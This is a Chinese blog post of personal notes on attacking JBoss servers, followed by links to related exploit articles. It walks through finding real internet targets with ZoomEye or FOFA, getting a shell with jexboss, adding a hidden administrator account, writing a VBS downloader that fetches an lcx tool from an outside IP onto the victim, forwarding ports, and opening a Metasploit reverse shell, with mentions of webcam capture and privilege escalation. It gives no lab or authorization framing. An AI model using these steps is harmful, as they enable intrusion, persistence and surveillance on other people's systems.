jboss漏洞利用

最新推荐文章于 2022-10-24 19:54:50 发布
最新推荐文章于 2022-10-24 19:54:50 发布
阅读量3.8k 收藏 1
点赞数
分类专栏: 笔记整理 文章标签: jboss 反弹shell 端口转发
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xg_ren/article/details/79144157
版权

JBOSS简介

1、 概念

JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3.0的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。

2、优点
  1. JBoss是免费的,开放源代码J2EE的实现,通过LGPL许可证进行发布。
  2. JBoss需要的内存和硬盘空间比较小。
  3. 安装非常简单。先解压缩JBoss打包文件再配置一些环境变量就可以了。
  4. JBoss能够”热部署”,部署BEAN只是简单拷贝BEAN的JAR文件到部署路径下就可以了。如果没有加载就加载它;如果已经加载了就自动更新。
  5. JBoss与Web服务器在同一个Java虚拟机中运行,Servlet调用EJB不经过网络,从而大大提高运行效率,提升安全性能。
  6. 用户可以直接实施J2EE-EAR,而不是以前分别实施EJB-JAR和Web-WAR,非常方便。
  7. Jboss支持集群

漏洞利用

1、利用工具

从github上下载jboss利用工具jexboss;python运行jexboss.py后接参数:-u后加链接;-host后接ip

2、寻找目标

利用钟馗之眼或fofa等进行jboss搜索;选择目标,利用工具进行扫描

3、getshell

利用工具进行ip或链接扫描后会自动写入一个shell,并返回给你,直接得到一个命令行

4、创建隐藏用户或激活guest用户

1.创建隐藏管理员用户

net user test$ test /add
net localgroup administrators test$ /add

2.激活guest用户

net user guest /active:yes
net user guest 1234
net localgroup administrators guest /add
5、端口转发

1.因为得到的shell处于一个内网中;所以想尝试端口转发到自己的vbs上
2.win cmd中下载端口转发工具

echo Set xPost = CreateObject("Microsoft.XMLHTTP") >> dc.vbs   
echo xPost.Open "GET","http://45.32.62.186/lcx.txt",0 >> dc.vbs 
echo xPost.Send() >> dc.vbs 
echo Set sGet = CreateObject("ADODB.Stream") >> dc.vbs   
echo sGet.Mode = 3 >> dc.vbs 
echo sGet.Type = 1 >> dc.vbs   
echo sGet.Open() >> dc.vbs   
echo sGet.Write(xPost.responseBody) >> dc.vbs  
echo sGet.SaveToFile "C:/PACS/dcm4chee-mysql-2.14.5/bin/lcx.txt",2 >> dc.vbs

将txt文件转为exe文件
3. lcx端口转发

内网主机
lcx.exe -slave 对外主机ip 转发到的端口 内网主机ip 要转发的端口
对外主机
lcx.exe -listen 转发到的端口 接收端口(未占用)
外网访问
对外主机ip:接收的端口

对外的主机
lcx.exe -tran 转发到的端口 内网主机ip 要转发的端口 
外网访问
对外主机ip:转发到的端口

最后是失败的;还在找原因

6、msf利用win漏洞实现shell反弹

1.在vbs上安装msf工具
2.执行下列命令

search web_delivery  //列出漏洞利用模块
use exploit/windows/misc/regsvr32_applocker_bypass_server  //这个模块win7以上都通杀,但是360会拦截
set lhost ip
set lport 端口
exploit  // 会生成一个exp,将exp复制到win命令行执行,并会返回到本地一个session
sessions -i 返回的sessionid   //-i是调用sessionid的参数

得到一个反弹回来的shell,权限与你得到shell权限一样,可以输入shell进入cmd命令行;或help查看其它参数能执行其它功能;比如截对方的屏幕;打开对方摄像头等

3.提权

  • 如果你得到的是一个低权限用户,可以通过bybass UAC 来提升到管理员权限,具体操作不在这篇介绍,等我再了解下会写专门的博客记录
  • 虽然我们反弹回来shell,但是在目标机上打开了一个shell的进程,我们提权后可以将这个进程植入到一个目标机本身存在的进程 中,如果该进程是system运行的,我们还可以提升到system权限

关于meterpreter的具体使用见后面的笔记;谢谢

xg_ren
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
一次老版本jboss反序列化漏洞利用分析
C20220511的博客
09-28 1218
所以我们直接利用ysoserial的Hibernate1利用链是不能成功的,但是仔细对Hibernate1利用链进行分析可以看出漏洞利用过程中的调用栈中并没有涉及到上述不存在的类,上述不存在的类主要用于设置一些类的属性字段,可以通过其他类来代替。这里可以看出jboss中引入的是CommonsCollections2.1的版本,而一般我们平时能利用的版本都是3.x。调试反序列化利用链的代码是一个很麻烦的事情,有兴趣的小伙伴可以把我上面的代码去跟一下,其中主要用到的调用过程如下。
深入浅出带你学习JBoss中间件常见漏洞
最新发布
Spontaneous_0的博客
02-19 507
深入浅出带你学习JBoss中间件常见漏洞
JBoss中间件漏洞汇总
热门推荐
混子
11-18 1万+
目录 一、JBoss是什么? 二、安装环境 1. Jdk 2. 下载JBoos4、6,并进行配置 三、 反序列漏洞 1. HttpInvoker 组件(CVE-2017-12149) 2. JMXInvokerServlet组件(CVE-2015-7501) 3. JBossMQ(CVE-2017-7504) 4.EJBInvokerServlet组件(CVE-2013-4810) 四、 War后门文件部署 1. admin-cosole(爆红接着传) 2. JMX-console.
Jboss漏洞利用
u011215939的博客
01-23 8124
所需工具:kallinux,jexboss,ZoomEye; JBoss应用服务器(JBoss AS)是一个被广泛使用的开源Java应用服务器。它是JBoss企业中间件(JEMS)的一部分,并且经常在大型企业中使用。因为这个软件是高度模块化和松耦合的,导致了它很很复杂,同时也使它易成为攻击者的目标。为了更好的利用这个漏洞,我直接使用一个自动化获取shell的工具:jexboss。 1
JBoss漏洞
周星星的博客
10-24 1002
JBoss漏洞的简单学习记录
Jboss漏洞利用小工具
11-06
提供的"Jboss漏洞利用小工具.jar"很可能是一个用于测试和演示JBoss漏洞的工具。这样的工具通常包含预设的exploits,可以模拟攻击者的行为,帮助管理员发现并修复潜在的安全问题。使用时需谨慎,避免在生产环境中...
Jboss漏洞利用总结1
08-03
JBoss 漏洞利用总结】 JBoss 是一款基于 J2EE 的开源应用服务器,遵循 LGPL 许可,允许在商业应用中免费使用。它主要作为 EJB 容器和服务器,支持 EJB 1.1、2.0 和 3.0 规范。虽然 JBoss 核心服务不包含 Web 容器...
Struts2及jboss漏洞利用工具
08-06
最后,提供的"Struts2及jboss漏洞利用工具"可能是一个用于测试系统安全性的工具,也可能被恶意用户用来探测和利用漏洞。作为负责任的IT专业人员,我们应只在授权的环境中使用此类工具,并且仅用于合法的安全评估和...
Jboss Application Server反序列化命令执行漏洞利用工具(CVE-2017-12149)
07-23
漏洞利用工具如压缩包中的"jbosscve-2017-12149",是安全研究人员或渗透测试者用来检测和测试系统是否受到该漏洞影响的工具。这些工具通常包含精心设计的恶意序列化数据,以及用于触发和验证漏洞利用的脚本。它们...
Java反序列化漏洞利用工具(WebLogic&Jboss
01-01
使用注意: 1. WebLogic反弹需要等5秒左右 2. 该工具为对外测试版,请尽量按照正常思路来用,比如Url填写清楚,IP地址写对了,报错或者抛异常神马的别怪我,调输入校验好蛋疼。 本工具与网上已公布工具优点: 1. 综合实现网上公布的代码执行、反弹 2. jboss利用里添加一键getshell功能,利用的是jboss的热部署功能,直接部署一个war包,一键返回一个菜刀shell 3. 反弹shell部分更完美,不再加载远程war包,直接发包完成反弹。 4. jboss回显执行命令部分利用异常抛出机制,本地(4.2.3.GA)测试成功,其他版本请自测 5. 体积更小,不再依赖java环境,但程序采用.net编写,需要.net 4.0环境 待完成: weblogic回显结果测试中,稍后加入
jboss-web-2.1.0.GA.zip
06-20
jboss-web-2.1.0.GA.zip 绿色包
利用JBOSS漏洞抓肉鸡
404
01-23 7052
JBOSS是中间件,解析JSP的文件,由于中间件爆发漏洞一般很少人打补丁,这次我们利用jboss漏洞抓肉鸡。 利用工具:jexboss-master 这个工具是Python写的在我的资源里面已经分享可以下载,也可以自己在github上面寻找 网络搜索引擎:zoomeye(钟馗之眼) 在抓肉鸡之前我们要明白目标,那就是使用jboss中间件的服务器 进入zoomeye搜索关键词jboss(这
Jboss漏洞
weixin_43873557的博客
02-05 333
Jboss概述 一个基于J2EE的开放源代码的应用服务器。JBoss是一个管理EJB的容器和服务器, 但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使 用。Jboss是Java EE应用服务器(就像Apache是web服务器一样),专门用来运行 Java EE程序的。 ➢ Jboss历史漏洞(访问控制不严导致的漏洞) JMX Console未授权访问Getshell JMX Console HtmlAdaptor Getshell(CVE-2007-
JBoss远程方法调用漏洞利用详解
weixin_33777877的博客
10-19 420
早上起床打开微博看到空虚浪子心大神发的一篇有关Jboss漏洞的文章,对我等菜鸟来说那边文章看起来还是很吃力的,所以查了查国内外的资料,翻译写了这边文章,记录一下。 在JBoss服务器上部署web应用程序,有很多不同的方式,诸如:JMX Console、Remote Method Invocation(RMI)、JMXInvokerServlet、HttpAdapter等。 本文主要是关于RMI远程...
JBoss中间件漏洞总结
weixin_42345596的博客
08-27 1315
一.Jboss简介 Jboss是一个基于J2EE的开放源代码的应用服务器。JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。 默认端口:8080 二.Jboss安装 下载地址:https://jbossas.jboss.org/downloads/ 1.安装jdk 这里用了两台机子,一台安装老版本J
JBoss历史漏洞汇总与复现
m0_48108919的博客
04-02 6845
前言:jBoss是一个基于J2EE的开发源代码的应用服务器。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。 默认端口:8080,9990 一、jboss 代码执行 (CVE-2017-12149) ...
JBoss漏洞总结
qq1325928591的博客
12-28 4036
近期遇到一次考核,两题都是关于jboss的相关漏洞,虽然都复现过,毕竟脑子有限,还是进行总结一下 jboss一般有2种类型的的漏洞: a.访问控制不严导致的漏洞 b.反序列化漏洞 Jboss管理控制台说明 jboss 4.x 及其之前的版本 console 管理路径为 /jmx-console/ 和 /web-console/ jmx-console的配置文件为: /opt/jboss/jboss4/server/default/deploy/jmx-console.war/WEB-INF/jboss-w

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值